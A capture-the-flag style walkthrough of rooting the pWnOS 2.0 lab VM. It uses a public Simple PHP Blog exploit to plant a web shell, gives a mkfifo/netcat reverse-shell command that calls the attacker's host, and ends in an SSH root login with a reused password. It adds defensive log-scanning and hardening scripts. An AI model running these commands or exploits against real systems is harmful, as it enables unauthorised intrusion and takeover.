pWnOS 2.0 Walkthrough (OSCP Prep)

Introduction
In today’s installment in the OSCP Prep series, we’ll walk through owning pWnOS v2.0 from VulnHub.
pWnOS turned out to be a very simple machine requiring no more than basic enumeration to gain a foothold and move on to root quickly.
Before We Begin
According to the description, the pWnOS VM is set up with a static IP of 10.10.10.100. We’ll have to adjust our virtual network configuration accordingly in order to have connectivity to the machine. The virtual machine’s settings:
- IP: 10.10.10.100
- Netmask: 255.255.255.0
- Gateway: 10.10.10.15
I’ll also add the machine to the /etc/hosts file before beginning scanning.
Scanning
We’ll use RustScan to find any open ports and try to find some version information from Nmap.
(ori0n@apophis) --> [ ~/pwnos ]
==> rustscan -a pwnos -- -sV -oA scans/nmap-initial
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:80
Open 10.10.10.100:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-initial" on ip 10.10.10.100
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 07:44 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:44
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 07:44, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:44
Scanning pwnos (10.10.10.100) [2 ports]
Discovered open port 80/tcp on 10.10.10.100
Discovered open port 22/tcp on 10.10.10.100
Completed Connect Scan at 07:44, 0.00s elapsed (2 total ports)
Initiating Service scan at 07:44
Scanning 2 services on pwnos (10.10.10.100)
Completed Service scan at 07:45, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for pwnos (10.10.10.100)
Host is up, received syn-ack (0.00035s latency).
Scanned at 2021-08-15 07:44:57 CDT for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.2.17 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
SSH is typically not an attack vector, so we’ll begin with port 80.
Enumerating the Web Server
Launch a browser and head to http://pwnos. We’re greeted with an internal website.
We can try SQL injection on the “Login” page, and it seems to work; however, we are never redirected anywhere useful.
Let’s use gobuster to search for any hidden files or folders.
(ori0n@apophis) --> [ ~/pwnos ]
==> gobuster dir -u http://pwnos -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pwnos
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/15 07:53:06 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 854]
/blog (Status: 301) [Size: 297] [--> http://pwnos/blog/]
/login (Status: 200) [Size: 1174]
/register (Status: 200) [Size: 1562]
/info (Status: 200) [Size: 49828]
/includes (Status: 301) [Size: 301] [--> http://pwnos/includes/]
/activate (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status (Status: 403) [Size: 286]
===============================================================
2021/08/15 07:53:47 Finished
===============================================================
It looks like we have a blog available. Let’s check it out.
Getting a Foothold
So we have the blog app version: Simple PHP Blog 0.4.0. Are there any public exploits?
(ori0n@apophis) --> [ ~/pwnos ]
==> searchsploit simple php blog 0.4.0
------------------------------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------------------------------ -----------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
------------------------------------------------------------------------ -----------------------
Shellcodes: No Results
We want to avoid Metasploit, so let’s download the Perl script and have a look.
(ori0n@apophis) --> [ ~/pwnos ]
==> searchsploit -m php/webapps/1191.pl
Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
URL: https://www.exploit-db.com/exploits/1191
Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable
Copied to: /home/ori0n/pwnos/1191.pl
(ori0n@apophis) --> [ ~/pwnos ]
==> mv 1191.pl sploit.pl
(ori0n@apophis) --> [ ~/pwnos ]
==> ./sploit.pl
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Program : ./sploit.pl
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.
Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!
Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com
Usage : ./sploit.pl [-h host] [-e exploit]
-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File
Examples: ./sploit.pl -h 127.0.0.1 -e 2
./sploit.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
./sploit.pl -h 127.0.0.1 -e 4 -F ./index.php
./sploit.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
./sploit.pl -h 127.0.0.1 -e 1
It looks like we can upload a PHP shell. Let’s give it a shot.
(ori0n@apophis) --> [ ~/pwnos ]
==> ./sploit.pl -h http://pwnos/blog -e 1
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....
Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://pwnos/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://pwnos/blog
Created reset.php on target host: http://pwnos/blog
Removed cmd.php from your local machine.
Failed to POST 'http://pwnos/blog/images/reset.php': 500 Internal Server Error at ./sploit.pl line 418.
Removed reset.php from your local machine.
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=id;ls+-la"
<hr/><pre>Command: id;ls -la</pre><hr/><br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 16
drwxrwxrwx 2 www-data www-data 4096 Jun 20 17:16 .
drwxrwxrwx 11 root root 4096 May 9 2011 ..
-rw-r--r-- 1 www-data www-data 172 Jun 20 17:16 cmd.php
-rw-r--r-- 1 www-data www-data 113 Jun 20 17:16 reset.php
</pre><hr/>.
We have command execution! Now let’s get a better shell. Do we have Netcat available?
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=which+nc"
<hr/><pre>Command: which nc</pre><hr/><br><pre>/bin/nc
</pre><hr/>.
We do. Is it a helpful version or the pesky OpenBSD build?
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=nc+-h+2>%261"
<hr/><pre>Command: nc -h 2>&1</pre><hr/><br><pre>OpenBSD netcat (Debian patchlevel 1.89-3ubuntu5)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
</pre><hr/>.
It’s the OpenBSD version. No worries. We’ll just use the pipe trick: rm /tmp/f; mkfifo /tmp/f; bash < /tmp/f | nc 10.10.10.10 4444 > /tmp/f 2>&1. We’ll set up a listener in another terminal and see if we can catch a shell.
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261"
And it works! We’ve got our shell.
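From the defender’s side, the three curl requests above are exactly what an access-log review should catch: a .php file fetched from the blog’s images/ directory (which should only ever serve static content), a cmd= query parameter, and finally a command carrying the mkfifo/nc pattern. The script below is an added example, not from the original post, the pWnOS VM or Simple PHP Blog; it flags such lines in an Apache combined-format access log. The sample lines are constructed (modelled on the requests shown above), and the static-directory list, parameter names and the default Ubuntu log path /var/log/apache2/access.log are assumptions to tune for a real deployment.

```python
"""Flag web-shell style requests in Apache combined-format access logs.

Added example for this walkthrough (not code from the original post, the pWnOS
VM or Simple PHP Blog). Assumes the default Apache "combined" LogFormat; the
SAMPLE_LOG lines are constructed, modelled on the cmd.php requests above.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" LogFormat: client identd user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only serve static files; a .php request under them
# is suspicious (the exploit above dropped cmd.php into /blog/images/).
STATIC_DIRS = ("/images/", "/uploads/", "/css/", "/js/")

# Parameter names web shells commonly use to carry the command (assumption).
COMMAND_PARAMS = {"cmd", "c", "exec", "command"}

# Substrings that point at a reverse shell or pipe trick being launched.
REVERSE_SHELL_INDICATORS = ("mkfifo", "nc ", "/dev/tcp/", "bash -i", "sh -i")


def parse_query(target):
    """Split 'path?query' into the path and a dict of decoded parameters.

    The query is split on '&' *before* decoding, so an encoded '%26' inside a
    value (as in '2>%261') stays part of that value instead of ending it.
    """
    path, _, query = target.partition("?")
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return path, params


def inspect_line(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m.group("target"))
    reasons = []
    low = path.lower()
    if low.endswith(".php") and any(d in low for d in STATIC_DIRS):
        reasons.append("php-in-static-dir")
    cmd_values = [v for k, v in params.items() if k.lower() in COMMAND_PARAMS]
    if cmd_values:
        reasons.append("cmd-parameter")
        if any(ind in v for v in cmd_values for ind in REVERSE_SHELL_INDICATORS):
            reasons.append("reverse-shell-indicators")
    if not reasons:
        return None
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "path": path,
        "command": cmd_values[0] if cmd_values else None,
        "reasons": reasons,
    }


def scan_log(lines):
    """Run inspect_line over an iterable of log lines, keeping only findings."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log, modelled on the requests in the walkthrough.
SAMPLE_LOG = """\
10.10.10.50 - - [20/Jun/2021:17:10:01 -0400] "GET /blog/index.php HTTP/1.1" 200 854 "-" "Mozilla/5.0"
10.10.10.10 - - [20/Jun/2021:17:16:02 -0400] "GET /blog/images/cmd.php?cmd=id;ls+-la HTTP/1.1" 200 512 "-" "curl/7.74.0"
10.10.10.10 - - [20/Jun/2021:17:16:40 -0400] "GET /blog/images/cmd.php?cmd=which+nc HTTP/1.1" 200 88 "-" "curl/7.74.0"
10.10.10.50 - - [20/Jun/2021:17:17:00 -0400] "GET /blog/images/logo.png HTTP/1.1" 200 4321 "http://pwnos/blog/" "Mozilla/5.0"
10.10.10.10 - - [20/Jun/2021:17:18:11 -0400] "GET /blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261 HTTP/1.1" 200 0 "-" "curl/7.74.0"
"""


def demo():
    """Scan the constructed sample; returns the three cmd.php findings."""
    return scan_log(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in demo():
        print(f["time"], f["client"], f["path"], f["reasons"], repr(f["command"]))
```

On a real host, feed the file directly: scan_log(open("/var/log/apache2/access.log")). The first two findings (a PHP file under images/ with a command parameter) are enough to trigger on the upload itself, before the reverse shell ever goes out; the third reason only adds confidence.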
On to root
With a shell in hand, let’s enumerate the web server from the inside. We find a potentially juicy file.
cd /var/www
ls -l
total 36
-rw-r--r-- 1 root root 1374 Mar 24 2008 activate.php
drwxrwxrwx 11 root root 4096 May 9 2011 blog
drwxr-xr-x 2 root root 4096 May 7 2011 includes
-rw-r--r-- 1 root root 629 May 7 2011 index.php
-rw-r--r-- 1 root root 23 Apr 3 2008 info.php
-rw-r--r-- 1 root root 3091 May 7 2011 login.php
-rw-r--r-- 1 root root 516 Apr 2 2008 mysqli_connect.php
-rw-r--r-- 1 root root 4618 Apr 2 2008 register.php
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
Unfortunately, this password doesn’t seem to actually get us into the database. Moving on.
cd ..
ls -l
total 56
drwxr-xr-x 2 root root 4096 Apr 21 2011 backups
drwxr-xr-x 8 root root 4096 May 7 2011 cache
drwxrwxrwt 2 root root 4096 May 7 2011 crash
-rw-r--r-- 1 root root 177 May 7 2011 index.html
drwxr-xr-x 34 root root 4096 May 7 2011 lib
drwxrwsr-x 2 root staff 4096 Apr 21 2011 local
drwxrwxrwt 4 root root 80 Jun 20 16:33 lock
drwxr-xr-x 11 root root 4096 Jun 20 16:32 log
drwxrwsr-x 2 root mail 4096 May 7 2011 mail
-rw-r--r-- 1 root root 520 May 7 2011 mysqli_connect.php
drwxr-xr-x 2 root root 4096 May 7 2011 opt
drwxr-xr-x 10 root root 420 Jun 20 16:32 run
drwxr-xr-x 4 root root 4096 May 7 2011 spool
drwxrwxrwt 2 root root 4096 Apr 21 2011 tmp
drwxr-xr-x 2 root root 4096 May 7 2011 uploads
drwxr-xr-x 4 root root 4096 May 9 2011 www
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
What’s this? Another MySQL root password? Let’s try this one.
mysql -u root -p
root@ISIntS
show databases;
quit;
Database
information_schema
ch16
mysql
It’s going to be a pain to try to use MySQL from this netcat shell. We’ll need to upgrade our shell, but first, let’s see if password reuse is an issue on this box. Can root log in through SSH?
grep -i root /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
He can. Let’s try this password from another terminal.
(ori0n@apophis) --> [ ~/pwnos ]
==> ssh root@pwnos
root@pwnos's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Sun Jun 20 17:33:53 EDT 2021
System load: 0.0 Processes: 80
Usage of /: 3.0% of 38.64GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
And it works! Winner, winner, chicken dinner!
There is no flag on this system. We’ve got root. We’ve won.
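Three misconfigurations made this chain work: a world-writable images/ directory under the web root (the drwxrwxrwx listing above is what let www-data drop cmd.php there), database credentials for the MySQL root user sitting in a world-readable PHP file, and sshd allowing password logins for root, so that one reused password finished the job. The following Python audit is an added example, not part of the original post or the VM, that reports each of these. The web root it inspects and the sshd_config it parses are constructed for the demo; the parser considers only global sshd settings (Match blocks are skipped, an assumption), and the "images"/"uploads" directory names are assumptions to adjust per application.

```python
# Added audit example, not code from the original post or the pWnOS VM.
# Assumes PHP configs in the DEFINE('DB_USER', ...) style shown above and a
# stock OpenSSH sshd_config; the sample files below are constructed.
import os
import re
import stat
import tempfile

# Matches DEFINE ('DB_USER', 'root'); in any case, single or double quotes.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](DB_[A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""", re.IGNORECASE)
# Directory names under the web root that should never hold executable PHP.
STATIC_DIR_NAMES = ("images", "uploads")


def find_db_credentials(text):
    """Return {constant: value} for DB_* constants defined in PHP source."""
    return dict(DEFINE_RE.findall(text))


def audit_webroot(root):
    """Walk a document root and return (kind, path) findings: world-writable-dir
    (lets www-data drop cmd.php into images/), php-in-static-dir,
    db-user-is-root and credentials-world-readable."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world-writable-dir", dirpath))
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            if os.path.basename(dirpath) in STATIC_DIR_NAMES:
                findings.append(("php-in-static-dir", full))
            with open(full, encoding="utf-8", errors="replace") as fh:
                creds = find_db_credentials(fh.read())
            if not creds:
                continue
            if creds.get("DB_USER", "").lower() == "root":
                findings.append(("db-user-is-root", full))
            if os.stat(full).st_mode & stat.S_IROTH:  # readable by "other"
                findings.append(("credentials-world-readable", full))
    return findings


def parse_sshd_config(text):
    """Effective global keywords (lower-cased) -> value. sshd keeps the first
    value it sees for a keyword, so later duplicates are ignored; everything
    from the first Match block on is skipped (assumption: global settings only)."""
    settings = {}
    for raw in text.splitlines():
        m = re.match(r"([A-Za-z]+)\s*=?\s*(.*)", raw.split("#", 1)[0].strip())
        if not m:
            continue  # blank or comment-only line
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def check_sshd_config(text):
    """Return (keyword, current value, fix) for the settings this box relied on."""
    s = parse_sshd_config(text)
    findings = []
    # Missing keyword: OpenSSH releases before 7.0 defaulted PermitRootLogin to yes.
    root_login = s.get("permitrootlogin", "yes (implicit default before OpenSSH 7.0)")
    if root_login.lower().startswith("yes"):
        findings.append(("permitrootlogin", root_login,
                         "set PermitRootLogin no (or without-password if key-only root access is needed)"))
    pw_auth = s.get("passwordauthentication", "yes (implicit default)")
    if pw_auth.lower().startswith("yes"):
        findings.append(("passwordauthentication", pw_auth,
                         "set PasswordAuthentication no and use keys; this closes the password-reuse path"))
    return findings


SAMPLE_PHP = """<?php # constructed, modelled on mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'constructed-example');
"""
SAMPLE_SSHD = """Port 22
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
PasswordAuthentication yes
PermitRootLogin no
"""


def demo():
    """Build a constructed tree like /var/www on pWnOS, audit it, check sshd."""
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "blog", "images")
        os.makedirs(images)
        os.chmod(os.path.join(root, "blog"), 0o755)
        os.chmod(images, 0o777)  # drwxrwxrwx, as in the listing above
        with open(os.path.join(images, "cmd.php"), "w") as fh:
            fh.write("<?php // constructed placeholder\n")
        cfg = os.path.join(root, "mysqli_connect.php")
        with open(cfg, "w") as fh:
            fh.write(SAMPLE_PHP)
        os.chmod(cfg, 0o644)  # -rw-r--r--, as in the listing above
        fs_findings = audit_webroot(root)
    return {"filesystem": fs_findings, "sshd": check_sshd_config(SAMPLE_SSHD)}
```

Point audit_webroot at /var/www (and, as this box shows, at the parent directory too, since a second copy of mysqli_connect.php was lying in /var) and check_sshd_config at the contents of /etc/ssh/sshd_config. The fixes are the usual ones: images/ and uploads/ owned by root and not writable by the web user, the credential file chowned root:www-data with mode 0640 and a dedicated low-privilege MySQL account, and root SSH logins off.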
Wrapping Up
pWnOS 2.0 was a fun box, but a very quick own. It will be worth coming back to later to look for other methods to get root.